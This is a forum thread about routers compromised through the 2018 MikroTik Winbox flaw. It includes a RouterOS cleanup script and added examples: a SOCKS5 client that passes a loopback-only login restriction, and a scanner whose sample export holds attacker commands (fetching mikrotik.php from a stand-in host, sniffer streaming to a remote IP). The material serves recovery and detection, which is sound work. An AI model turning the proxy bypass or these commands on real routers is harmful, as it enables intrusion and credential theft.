43north
Member Candidate
Posts: 181
Joined: Fri Nov 14, 2014 7:06 am

Re: Winbox vulnerability: please upgrade

Wed Aug 08, 2018 2:52 am

It was empty where I checked, too. It's possibly just a presence indicator in the swarm for the C&C, as you also mentioned...
As I mentioned, my file was empty as well; that makes sense with what you guys are saying.
 
kobuki
Member Candidate
Posts: 118
Joined: Sat Apr 02, 2011 5:59 pm

Re: Winbox vulnerability: please upgrade

Wed Aug 08, 2018 3:00 am

Is he trying to use Winbox to connect
No idea, but possible.
how would you route a Winbox connection through a socks proxy?
I assume that's a rhetorical question.
 
excession
just joined
Posts: 12
Joined: Mon May 11, 2015 8:16 pm

Re: Winbox vulnerability: please upgrade

Wed Aug 08, 2018 3:19 am

Is he trying to use Winbox to connect
No idea, but possible.
how would you route a Winbox connection through a socks proxy?
I assume that's a rhetorical question.
Haha, actually no, just one based on an almost complete ignorance of SOCKS!
I did just find some interesting discussion here: viewtopic.php?t=101874
I think I now understand: I imagine he used an SSH client to open the SOCKS connection, then SSH to connect to his router through that tunnel.
 
aswin
just joined
Posts: 5
Joined: Tue Jul 11, 2017 6:26 pm

Re: Winbox vulnerability: please upgrade

Wed Aug 08, 2018 4:15 am

2. I have tried to log in to the remote MikroTik with that password, but with no success, so I think the problem comes from the hacker allowing only IP 127.0.0.1 to log in with the "sys" account.
And the hacker used a script to disable hard reset, so I just ask: can I use the serial cable to log in? (The infected router is still located at another place.)
If you haven't figured it out yet, you could try connecting to 127.0.0.1 on your router using the SOCKS service, which has probably been enabled on your device by the attacker. That assumes you've already hacked the 'sys' user's password.
Smart idea. Is he trying to use Winbox to connect, and if so, how would you route a Winbox connection through a SOCKS proxy?
Following kobuki's suggestion, I used HTTP to log in via SOCKS, not Winbox.
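The trick aswin and kobuki describe, as an added example that is not code from any post in this thread and not MikroTik's: when the attacker restricts a user to allowed-address=127.0.0.1, a SOCKS5 CONNECT sent to the router's own socks service for 127.0.0.1:80 makes the router open that TCP connection itself, so the www service sees a loopback client and the restriction is satisfied. The handshake is written out with the standard library so the bytes on the wire are visible; the two mock servers standing in for the router's socks and www services are constructed so the exchange runs offline, and the proxy is assumed to require no authentication (the thread does not say which mode the attacker's socks was left in).

```python
"""SOCKS5 CONNECT through a RouterOS-style socks proxy to the proxy's own loopback.

Added example; the mocks are constructed stand-ins, not the router's services.
"""
import socket
import struct
import threading

SOCKS_VERSION, NO_AUTH, CMD_CONNECT, ATYP_IPV4, ATYP_DOMAIN = 5, 0x00, 0x01, 0x01, 0x03


def recv_exact(sock, n):
    """Read exactly n bytes or raise; SOCKS fields are fixed-size."""
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed during SOCKS exchange")
        buf += chunk
    return buf


def build_connect_request(host, port):
    """VER CMD RSV ATYP DST.ADDR DST.PORT (RFC 1928 section 4). An IPv4 literal is
    sent as ATYP_IPV4, so the proxy resolves nothing: 127.0.0.1 is *its* loopback."""
    try:
        addr = bytes([ATYP_IPV4]) + socket.inet_aton(host)
    except OSError:                       # not an IPv4 literal: send as a domain name
        name = host.encode()
        addr = bytes([ATYP_DOMAIN, len(name)]) + name
    return bytes([SOCKS_VERSION, CMD_CONNECT, 0x00]) + addr + struct.pack("!H", port)


def socks5_connect(sock, host, port):
    """Negotiate no-auth and CONNECT on an open socket to the proxy. Returns the
    bound (addr, port) the proxy reports; raises ConnectionError on refusal."""
    sock.sendall(bytes([SOCKS_VERSION, 1, NO_AUTH]))          # greeting offering one method
    ver, method = recv_exact(sock, 2)
    if ver != SOCKS_VERSION or method != NO_AUTH:
        raise ConnectionError(f"proxy refused no-auth (ver={ver}, method={method:#x})")
    sock.sendall(build_connect_request(host, port))
    ver, rep, _rsv, atyp = recv_exact(sock, 4)
    if ver != SOCKS_VERSION or rep != 0x00:
        raise ConnectionError(f"CONNECT refused, reply code {rep:#x}")
    if atyp == ATYP_IPV4:
        bound = socket.inet_ntoa(recv_exact(sock, 4))
    elif atyp == ATYP_DOMAIN:
        bound = recv_exact(sock, recv_exact(sock, 1)[0]).decode()
    else:
        raise ConnectionError(f"unsupported BND.ADDR type {atyp:#x}")
    return bound, struct.unpack("!H", recv_exact(sock, 2))[0]


def http_get_via_socks(proxy, target, path="/"):
    """CONNECT to target=(host, port) via proxy=(host, port), send one HTTP/1.0 GET
    and return the raw reply (HTTP/1.0 so the server closes when it is done)."""
    with socket.create_connection(proxy, timeout=5) as s:
        socks5_connect(s, *target)
        s.sendall(f"GET {path} HTTP/1.0\r\nHost: {target[0]}\r\n\r\n".encode())
        reply = b""
        while chunk := s.recv(4096):
            reply += chunk
    return reply


# ---- constructed stand-ins so the exchange can run offline --------------------
def _mock_socks(listener):
    """Stand-in for /ip socks: accepts one no-auth CONNECT (IPv4 only) and relays
    one request/response pair. The upstream connection is made by the proxy host."""
    conn, _ = listener.accept()
    with conn:
        _ver, nmethods = recv_exact(conn, 2)
        recv_exact(conn, nmethods)
        conn.sendall(bytes([SOCKS_VERSION, NO_AUTH]))
        recv_exact(conn, 4)                                     # VER CMD RSV ATYP(=IPv4)
        host = socket.inet_ntoa(recv_exact(conn, 4))
        port = struct.unpack("!H", recv_exact(conn, 2))[0]
        with socket.create_connection((host, port), timeout=5) as upstream:
            conn.sendall(bytes([SOCKS_VERSION, 0x00, 0x00, ATYP_IPV4]) + bytes(6))  # succeeded, 0.0.0.0:0
            upstream.sendall(conn.recv(4096))
            while chunk := upstream.recv(4096):
                conn.sendall(chunk)


def _mock_www(listener):
    """Stand-in for the router's www service: reports the client address it sees."""
    conn, peer = listener.accept()
    with conn:
        conn.recv(4096)
        body = f"client={peer[0]}\n".encode()
        conn.sendall(b"HTTP/1.0 200 OK\r\nContent-Length: %d\r\n\r\n" % len(body) + body)


def demo():
    """Start both mocks on loopback, fetch / through the proxy and return the body,
    i.e. the client address the www service saw (client=127.0.0.1)."""
    www, prx = socket.socket(), socket.socket()
    for srv in (www, prx):
        srv.bind(("127.0.0.1", 0))
        srv.listen(1)
    threading.Thread(target=_mock_www, args=(www,), daemon=True).start()
    threading.Thread(target=_mock_socks, args=(prx,), daemon=True).start()
    reply = http_get_via_socks(("127.0.0.1", prx.getsockname()[1]),
                               ("127.0.0.1", www.getsockname()[1]))
    return reply.split(b"\r\n\r\n", 1)[1].decode().strip()
```

Calling `demo()` returns `client=127.0.0.1`; against a real router you would point `proxy` at the router's socks port and `target` at `("127.0.0.1", 80)`, and the same handshake is what `curl --socks5 <router>:<port> http://127.0.0.1/` performs. Against a real router the client's own address is not loopback, which is exactly why the proxied connection passes the allowed-address check. Winbox cannot be pushed through a SOCKS proxy this simply, which is why the HTTP login worked for aswin.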
 
blackzero
just joined
Posts: 18
Joined: Tue Aug 09, 2011 3:40 pm

Re: Winbox vulnerability: please upgrade

Wed Aug 08, 2018 12:26 pm

***
 
sporkman
just joined
Posts: 24
Joined: Thu May 02, 2013 4:37 am

Re: Winbox vulnerability: please upgrade

Thu Aug 09, 2018 8:59 am

If you're curious how the bug works, this article is a good read:

https://n0p.me/winbox-bug-dissection/

The vulnerability would have been less of a problem if Mik had used industry-standard password-hashing methods: since the vulnerability allowed a remote attacker to download any file, and there's a file with a very weak encryption of the admin password, it makes getting a legit login really easy. If the password were properly encrypted, then the attacker would be out of luck or, at best, have to spend lots of effort cracking the password. And the better your password was, the harder to crack...

The bit about how Winbox fetches unsigned DLLs from the router is frightening as hell. You have a signed app (Winbox) grabbing DLLs (unsigned) from the router - imagine what an attacker could do by loading a trojaned DLL onto your Winbox-running PC.

I also saw a new variation on a hacked router today - they had started a packet sniffer watching for port 20, 21, 110 and 143 traffic and sending it off to a listener on the host 37.1.207.114. Fun trick! Looking for any cleartext passwords I assume. If they were more adventurous, they'd grab 5060 UDP and make some free phone calls too.
 
mrz
MikroTik Support
Posts: 5589
Joined: Wed Feb 07, 2007 12:45 pm
Location: Latvia

Re: Winbox vulnerability: please upgrade

Thu Aug 09, 2018 10:25 am

Winbox has not fetched DLLs for quite some time now. Do not use old Winbox.
 
sporkman
just joined
Posts: 24
Joined: Thu May 02, 2013 4:37 am

Re: Winbox vulnerability: please upgrade

Thu Aug 09, 2018 10:51 am

Winbox has not fetched DLLs for quite some time now. Do not use old Winbox.
Don't tell me, tell the guy that wrote the blog post. He did see it happen in his tcpdump though, I don't think he wrote that more than 3-4 months ago.
 
allstarcomps
just joined
Posts: 19
Joined: Sat Jul 08, 2017 10:36 pm
Location: San Diego, CA, USA

Re: Winbox vulnerability: please upgrade

Tue Aug 14, 2018 12:11 am

Here is the script I wrote to clean up after the IP socks / "service" user attack hit some of the old routers I have. After cleaning up, it downloads the latest ROS and does a midnight reboot to install the latest ROS and firmware. I do recommend testing in a lab before deploying in production. I did not check for disabled drop rules.
# Keep the memory log at 1000 lines.
/system logging action set memory-lines=1000 [find where name=memory]
# Drop the firewall rules the attacker added; they are commented "port NNNN" (the socks port).
/ip firewall filter remove [/ip firewall filter find where comment ~ "port [0-9]*"];
# Disable socks, restore its default settings and clear the access list.
/ip socks set enabled=no port=1080 max-connections=200 connection-idle-timeout=00:02:00;
/ip socks access remove [/ip socks access find];
# Remove the scripts that fetch mikrotik.php or turn socks back on.
/system script remove [find where source~"mikrotik.php"]
/system script remove [find where source~"socks set enabled=yes"]
# Remove the schedulers that re-arm them. Note: ~"port" is a substring match,
# so a legitimate scheduler whose name merely contains "port" is removed too.
/system scheduler remove [find where name~"port"]
/system scheduler remove [find where owner="service"]
# Remove the attacker's "service" user.
/user remove [find name=service]

# Reboot just before midnight; the package downloaded below installs on that reboot.
/system scheduler
add name=midnightReboot on-event="/system reboot \r\
    \ny" start-time=23:59:00
# At the next startup: remove both schedulers, flash the RouterBOARD firmware, reboot once more.
/system scheduler
add name=updateFirmware on-event="/system scheduler remove [find where name=\"up\
    dateFirmware\"]\r\
    \n:delay 2s\r\
    \n/system scheduler remove [find where name=\"midnightReboot\"]\r\
    \n/system routerboard upgrade\r\
    \n:delay 10s\r\
    \n/system reboot\r\
    \ny" start-time=startup
# Fetch the latest RouterOS package now; it is applied by the midnight reboot.
/system package update download
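The detection counterpart to the cleanup above, covering both the indicators allstarcomps removes and the sniffer sporkman saw, as an added example: this is not code from any post here and not a MikroTik tool. It reads the text that `/export` prints on a router and flags socks enabled, the "service" user, schedulers owned by it or named "port NNNN", firewall accept rules commented "port NNNN", scripts that fetch mikrotik.php or re-enable socks, and a packet sniffer streaming to 37.1.207.114; it also flags drop rules left disabled, which the cleanup script does not check. The sample export is constructed for the demo, and the attribute names are the common ones but may differ between RouterOS versions (an assumption).

```python
"""Flag the compromise indicators discussed in this thread in a RouterOS export.

Added example. SAMPLE_EXPORT is a constructed stand-in for '/export' output.
"""
import re

SAMPLE_EXPORT = r"""
# constructed sample in the shape of '/export' output from a compromised router
/ip firewall filter
add action=accept chain=input comment="port 4145" dst-port=4145 protocol=tcp
add action=drop chain=input comment="drop the rest" disabled=yes
/ip socks
set enabled=yes port=4145
/ip socks access
add action=allow src-address=0.0.0.0/0
/system scheduler
add name="port 4145" owner=service start-time=startup on-event=":delay 5s;\
    /ip socks set enabled=yes port=4145"
add name=upgrade owner=admin on-event="/system package update download" start-time=startup
/system script
add name=fetch owner=service source="/tool fetch url=http://example.invalid/mikrotik.php dst-path=u.rsc"
/tool sniffer
set filter-port=20,21,110,143 streaming-enabled=yes streaming-server=37.1.207.114
/user
add group=full name=service
add group=full name=admin
"""


def parse_export(text):
    """Yield (menu_path, entry) pairs. Export prints the menu path on its own line
    before the add/set entries under it, and wraps long entries with a trailing
    backslash, so continuation lines are joined back together first."""
    path, pending = None, ""
    for raw in text.splitlines():
        line = raw.strip()
        if line.endswith("\\"):
            pending += line[:-1]
            continue
        line, pending = pending + line, ""
        if not line or line.startswith("#"):
            continue
        if line.startswith("/"):
            path = line
        else:
            yield path, line


# (label, menu paths the pattern applies to, regex over the joined entry)
CHECKS = [
    ("socks service enabled",              ("/ip socks",),          r"\benabled=yes\b"),
    ("socks access open to any source",    ("/ip socks access",),   r"src-address=0\.0\.0\.0/0"),
    ("backdoor user 'service'",            ("/user",),              r"\bname=service\b"),
    ("scheduler owned by 'service'",       ("/system scheduler",),  r"\bowner=service\b"),
    ("scheduler named 'port NNNN'",        ("/system scheduler",),  r'name="?port \d+'),
    ("firewall rule commented 'port NNNN'", ("/ip firewall filter",), r'comment="?port \d+'),
    ("drop rule left disabled",            ("/ip firewall filter",), r"action=drop\b.*\bdisabled=yes\b"),
    ("script fetching mikrotik.php",       ("/system script",),     r"mikrotik\.php"),
    ("socks re-enabled from script/scheduler", ("/system script", "/system scheduler"), r"socks set enabled=yes"),
    ("sniffer streaming to remote host",   ("/tool sniffer",),      r"streaming-enabled=yes"),
]


def scan_export(text):
    """Return [(label, menu_path, entry), ...] for every entry matching a check."""
    findings = []
    for path, entry in parse_export(text):
        for label, menus, pattern in CHECKS:
            if path in menus and re.search(pattern, entry):
                findings.append((label, path, entry))
    return findings


def report(text):
    """Human-readable summary, one line per finding."""
    return "\n".join(f"{label:40} {path}: {entry}" for label, path, entry in scan_export(text))
```

Run it with `print(report(SAMPLE_EXPORT))`, or feed it the output of `/export` copied from a router under suspicion; every hit maps onto one of the `remove`/`set` lines in the cleanup script above, and the "drop rule left disabled" hit is the one that script leaves for you to handle by hand. The patterns are substring matches, like the `~"port"` finds in the script, so review each hit rather than deleting on sight.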
